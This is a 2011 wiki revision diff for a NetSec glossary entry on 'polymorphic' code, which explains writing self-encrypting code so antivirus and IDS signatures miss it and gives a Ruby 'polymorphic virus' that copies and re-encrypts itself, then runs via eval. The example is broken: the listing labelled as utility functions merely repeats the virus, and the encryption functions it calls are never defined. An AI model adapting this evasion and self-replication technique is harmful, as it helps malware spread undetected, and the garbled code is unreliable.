Questions about this topic? Sign up to ask in the talk tab.
Difference between revisions of "Polymorphic"
From NetSec
Gonzalo58T (Talk | contribs) |
|||
| Line 1: | Line 1: | ||
{{expand}} | {{expand}} | ||
Adj. referring to self-modifying code. | Adj. referring to self-modifying code. | ||
| + | |||
| + | |||
| + | = Reasons to write polymorphic code = | ||
| + | |||
| + | The main reason to write polymorphic code is to avoid being hashwise identified, or to have code signature detected, i.e. an IDS or anti-virus software will not identify the payload as it is nicely wrapped-up in an encrypted form. Another reason is to propagate it to multiple copies without having the same signature. | ||
| + | |||
| + | |||
| + | = Techniques of polymorphic code writing = | ||
| + | |||
| + | * Define a stackable set of encrypting/decrypting functions, preferrably working with an encryption key. Let's call these sets d and e (decryption / encryption), and let there be two integers n, m, n > m so that d[n](d[n-1](...(d[m](e[n](e[n-1](...e[m](code))...) == code | ||
| + | Note: you can write a single function or pair of functions and have them vary with a series of keys (outputted by a deterministic key generator ideally), as long as your encryption remains revertable. | ||
| + | * Write your payload code (that you want dissimulated). At the end of this code put some bootstrap that will decrypt and run the code (in PHP/ruby/perl/whatnot, eval it, in C, smash the stack with it, in C#, use reflection). At the beginning of your payload code, call for your encryption/duplication code. | ||
| + | |||
| + | = Example in Ruby = | ||
| + | |||
| + | == pv.rb (polymorphic virus) == | ||
| + | <pre> | ||
| + | #!/usr/bin/env ruby1.9.1 | ||
| + | if (!defined?(FILE)) | ||
| + | FILE=File.basename(__FILE__) | ||
| + | end | ||
| + | load "md.rb"; | ||
| + | #require "FileUtils" | ||
| + | def selfCopy(key) | ||
| + | code = "" | ||
| + | newkey = deterministicKeygen(key); | ||
| + | File.open(FILE, "r").each_line do |l| | ||
| + | code += l | ||
| + | end | ||
| + | code = mencrypt(code, key) | ||
| + | # define new file name | ||
| + | fn = rand(128).to_s + 'copy.rb'; | ||
| + | File.open(fn, 'w+') do |f| | ||
| + | f.write('load "md.rb";'+"\n"); | ||
| + | # this is needed because __FILE__ isn't to be found in eval | ||
| + | f.write("if (!defined?(FILE))\n\tFILE=__FILE__;\nend;\n"); | ||
| + | f.write('code="'+code+'";'+"\n") | ||
| + | f.write('eval(mdecrypt(code, ' + key.to_s+'))'); | ||
| + | end | ||
| + | return newkey | ||
| + | end | ||
| + | |||
| + | # initial key is 42, D.A. told me | ||
| + | key = 42 | ||
| + | # malicious section | ||
| + | # first, replicate | ||
| + | key = selfCopy(key) | ||
| + | # then do evil! | ||
| + | puts "Hello, it's savitri" | ||
| + | |||
| + | </pre> | ||
| + | |||
| + | == md.rb (utility functions) == | ||
| + | <pre> | ||
| + | #!/usr/bin/env ruby1.9.1 | ||
| + | if (!defined?(FILE)) | ||
| + | FILE=File.basename(__FILE__) | ||
| + | end | ||
| + | load "md.rb"; | ||
| + | #require "FileUtils" | ||
| + | def selfCopy(key) | ||
| + | code = "" | ||
| + | newkey = deterministicKeygen(key); | ||
| + | File.open(FILE, "r").each_line do |l| | ||
| + | code += l | ||
| + | end | ||
| + | code = mencrypt(code, key) | ||
| + | # define new file name | ||
| + | fn = rand(128).to_s + 'copy.rb'; | ||
| + | File.open(fn, 'w+') do |f| | ||
| + | f.write('load "md.rb";'+"\n"); | ||
| + | # this is needed because __FILE__ isn't to be found in eval | ||
| + | f.write("if (!defined?(FILE))\n\tFILE=__FILE__;\nend;\n"); | ||
| + | f.write('code="'+code+'";'+"\n") | ||
| + | f.write('eval(mdecrypt(code, ' + key.to_s+'))'); | ||
| + | end | ||
| + | return newkey | ||
| + | end | ||
| + | |||
| + | # initial key is 42, D.A. told me | ||
| + | key = 42 | ||
| + | # malicious section | ||
| + | # first, replicate | ||
| + | key = selfCopy(key) | ||
| + | # then do evil! | ||
| + | puts "Hello, it's savitri" | ||
| + | |||
| + | </pre> | ||
Revision as of 22:25, 9 November 2011
| This article contains too little information, it should be expanded or updated. |
|---|
Things you can do to help:
|
Adj. referring to self-modifying code.
Contents
[hide]Reasons to write polymorphic code
The main reason to write polymorphic code is to avoid being hashwise identified, or to have code signature detected, i.e. an IDS or anti-virus software will not identify the payload as it is nicely wrapped-up in an encrypted form. Another reason is to propagate it to multiple copies without having the same signature.
Techniques of polymorphic code writing
- Define a stackable set of encrypting/decrypting functions, preferrably working with an encryption key. Let's call these sets d and e (decryption / encryption), and let there be two integers n, m, n > m so that d[n](d[n-1](...(d[m](e[n](e[n-1](...e[m](code))...) == code
Note: you can write a single function or pair of functions and have them vary with a series of keys (outputted by a deterministic key generator ideally), as long as your encryption remains revertable.
- Write your payload code (that you want dissimulated). At the end of this code put some bootstrap that will decrypt and run the code (in PHP/ruby/perl/whatnot, eval it, in C, smash the stack with it, in C#, use reflection). At the beginning of your payload code, call for your encryption/duplication code.
Example in Ruby
pv.rb (polymorphic virus)
#!/usr/bin/env ruby1.9.1
if (!defined?(FILE))
FILE=File.basename(__FILE__)
end
load "md.rb";
#require "FileUtils"
def selfCopy(key)
code = ""
newkey = deterministicKeygen(key);
File.open(FILE, "r").each_line do |l|
code += l
end
code = mencrypt(code, key)
# define new file name
fn = rand(128).to_s + 'copy.rb';
File.open(fn, 'w+') do |f|
f.write('load "md.rb";'+"\n");
# this is needed because __FILE__ isn't to be found in eval
f.write("if (!defined?(FILE))\n\tFILE=__FILE__;\nend;\n");
f.write('code="'+code+'";'+"\n")
f.write('eval(mdecrypt(code, ' + key.to_s+'))');
end
return newkey
end
# initial key is 42, D.A. told me
key = 42
# malicious section
# first, replicate
key = selfCopy(key)
# then do evil!
puts "Hello, it's savitri"
md.rb (utility functions)
#!/usr/bin/env ruby1.9.1
if (!defined?(FILE))
FILE=File.basename(__FILE__)
end
load "md.rb";
#require "FileUtils"
def selfCopy(key)
code = ""
newkey = deterministicKeygen(key);
File.open(FILE, "r").each_line do |l|
code += l
end
code = mencrypt(code, key)
# define new file name
fn = rand(128).to_s + 'copy.rb';
File.open(fn, 'w+') do |f|
f.write('load "md.rb";'+"\n");
# this is needed because __FILE__ isn't to be found in eval
f.write("if (!defined?(FILE))\n\tFILE=__FILE__;\nend;\n");
f.write('code="'+code+'";'+"\n")
f.write('eval(mdecrypt(code, ' + key.to_s+'))');
end
return newkey
end
# initial key is 42, D.A. told me
key = 42
# malicious section
# first, replicate
key = selfCopy(key)
# then do evil!
puts "Hello, it's savitri"
